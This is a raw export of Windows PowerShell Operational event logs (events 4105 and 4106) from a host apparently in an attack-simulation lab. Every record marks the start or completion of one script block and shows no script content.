SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474402
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474401
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474400
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474399
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474398
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474397
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474396
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474395
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474394
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474393
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474392
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474391
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474390
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474389
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474388
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474387
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474386
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474385
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474384
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474383
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474382
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474381
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474380
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474379
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474378
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474377
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474376
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474375
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474374
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474373
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474372
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474371
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474370
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474369
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474368
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474367
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474366
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474365
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474364
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474363
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474362
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474361
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474360
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474359
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474358
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474357
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474356
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474355
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474354
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474353
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474352
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474351
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474350
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474349
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474348
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
